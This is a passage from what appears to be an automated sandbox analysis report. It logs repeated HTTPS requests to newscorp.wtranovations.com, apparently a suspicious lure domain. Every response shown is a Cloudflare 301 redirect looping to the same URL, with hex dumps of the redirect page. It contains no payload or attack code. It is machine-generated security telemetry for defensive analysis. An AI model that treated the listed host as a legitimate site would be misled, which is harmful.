                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      30192.168.11.1249406104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:10 UTC413OUTGET /ad083999f1/start?for=/edzxesfee/d205afd3/ HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Origin: https://newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:10 UTC971INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:10 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=3600
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:10 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/ad083999f1/start?for=/edzxesfee/d205afd3/
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3cuIUfmq5msjrCfars7HSoJEyM8SjwomSIOa3psIX1mQvoJUPzm0TYJXXnwuGp8Sye%2Bfty%2F8w6ALfTcyVmCStgWQu%2BLyiYpTG8U%2BEGKbzWdLmbT9Z3pjBrINGvuVB0NLhDCs2qKrb7Uwd13sFA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      Server-Timing: cfL4;desc="?proto=TCP&rtt=49&min_rtt=49&rtt_var=24&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=584&delivery_rate=0&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      Cf-Cache-Status: DYNAMIC
                                                                                                                                                                                                                      CF-RAY: 923e23d5fcfe029b-MIA
                                                                                                                                                                                                                      2025-03-21 14:29:10 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      31192.168.11.1249407104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:10 UTC370OUTGET /statsic/css/main.output.css HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:11 UTC1175INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:10 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:06 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/statsic/css/main.output.css
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uJCn5ZV0AZj3H3oSusErPqZ3NBMar0L%2FQM2m68W%2F070W5doQOXHdJlUzfSxnomowJvgbcHOoxHYqgdPqzFkITsPmhx87C8rydg6XzPpCbRuLY2xyQrxpxVQwcMEqWcX1rLAQZnuhur9w3P9xqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=44&min_rtt=44&rtt_var=22&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=663&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                      Age: 4
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23d779513714-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=134301&min_rtt=134219&rtt_var=28438&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=948&delivery_rate=30023&cwnd=252&unsent_bytes=0&cid=dcb643ef1fe4f0a8&ts=341&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:11 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      32192.168.11.1249408104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:11 UTC413OUTGET /ad083999f1/start?for=/edzxesfee/d205afd3/ HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Origin: https://newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:11 UTC1203INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:11 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=3600
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:11 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/ad083999f1/start?for=/edzxesfee/d205afd3/
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u4qBgeHGNrBIv5uKl4xznKpggpLV79Xv%2BxdevQeKk3695l8K4EthcZ1js8R8UiJvciAHDX%2Bv4D9k45lj2Ta%2FLwHYKb2saOvnmD1u6KvwpNicJZe44Wr4I1Q1G5S84ohWrj6A6%2FqtI%2BUtAPRT2Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=76&min_rtt=62&rtt_var=31&sent=3&recv=7&lost=0&retrans=0&sent_bytes=2354&recv_bytes=1885&delivery_rate=1056177419&cwnd=138&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23d9c95eda6f-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=127664&min_rtt=127640&rtt_var=26964&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=991&delivery_rate=31612&cwnd=252&unsent_bytes=0&cid=a456172276fad2e5&ts=333&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:11 UTC166INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></ht
                                                                                                                                                                                                                      2025-03-21 14:29:11 UTC7INData Raw: 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: ml>
                                                                                                                                                                                                                      2025-03-21 14:29:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      33192.168.11.1249409104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:11 UTC370OUTGET /statsic/css/main.output.css HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:11 UTC1175INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:11 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:06 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/statsic/css/main.output.css
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uJCn5ZV0AZj3H3oSusErPqZ3NBMar0L%2FQM2m68W%2F070W5doQOXHdJlUzfSxnomowJvgbcHOoxHYqgdPqzFkITsPmhx87C8rydg6XzPpCbRuLY2xyQrxpxVQwcMEqWcX1rLAQZnuhur9w3P9xqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=44&min_rtt=44&rtt_var=22&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=663&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                      Age: 5
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23db3960b3e6-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=129264&min_rtt=129205&rtt_var=27353&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=948&delivery_rate=31197&cwnd=252&unsent_bytes=0&cid=f37d9f6cb971eac3&ts=333&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:11 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      34192.168.11.1249410104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:11 UTC413OUTGET /ad083999f1/start?for=/edzxesfee/d205afd3/ HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Origin: https://newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:12 UTC1194INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:11 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=3600
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:11 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/ad083999f1/start?for=/edzxesfee/d205afd3/
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tch7nFhE8adth3l6kX%2FFmpjH%2F0fpgV3%2Bc6%2FXt%2Bb3t0HmEHrIUKqURxhHjdNlbO7pdY7lr1Ic9BUZkKK8EBfsoo8n2pzzc26x77%2FmtsLvqPxkc3u5%2Bdv9HV3ogsQi5BJKP3OT4jcLXpgCMizq8g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=69&min_rtt=69&rtt_var=34&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=608&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23dd9af1da4f-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=129129&min_rtt=129054&rtt_var=27337&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=991&delivery_rate=31232&cwnd=252&unsent_bytes=0&cid=a467b9f96c9a5da9&ts=344&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:12 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      35192.168.11.1249411104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:11 UTC370OUTGET /statsic/css/main.output.css HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:12 UTC1175INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:12 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:06 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/statsic/css/main.output.css
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uJCn5ZV0AZj3H3oSusErPqZ3NBMar0L%2FQM2m68W%2F070W5doQOXHdJlUzfSxnomowJvgbcHOoxHYqgdPqzFkITsPmhx87C8rydg6XzPpCbRuLY2xyQrxpxVQwcMEqWcX1rLAQZnuhur9w3P9xqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=44&min_rtt=44&rtt_var=22&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=663&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                      Age: 6
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23def978d9b1-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=128980&min_rtt=128921&rtt_var=27285&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=948&delivery_rate=31274&cwnd=252&unsent_bytes=0&cid=a6cce8876bf12656&ts=324&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:12 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      36192.168.11.1249412104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:12 UTC413OUTGET /ad083999f1/start?for=/edzxesfee/d205afd3/ HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Origin: https://newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:12 UTC987INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:12 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=3600
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:12 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/ad083999f1/start?for=/edzxesfee/d205afd3/
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gW%2FJz%2BAGLG3sYlKu2tu4UJLGs2CrXl7KjYnIB0azX7EGHHz%2FNoC2ZNG%2FhxCnTiKJztoJbJOuEP%2F38nfkK8P1ruFQ8ktuYZbEdafwup7TXpdwoptiVQLT81R%2Ban6zVmqItCZZ0xgTQ47da5w3TA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      Server-Timing: cfL4;desc="?proto=TCP&rtt=61&min_rtt=49&rtt_var=42&sent=2&recv=5&lost=0&retrans=0&sent_bytes=1110&recv_bytes=1168&delivery_rate=448513698&cwnd=182&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      Cf-Cache-Status: DYNAMIC
                                                                                                                                                                                                                      CF-RAY: 923e23e18d74e9f0-MIA
                                                                                                                                                                                                                      2025-03-21 14:29:12 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      37192.168.11.1249413104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:12 UTC370OUTGET /statsic/css/main.output.css HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
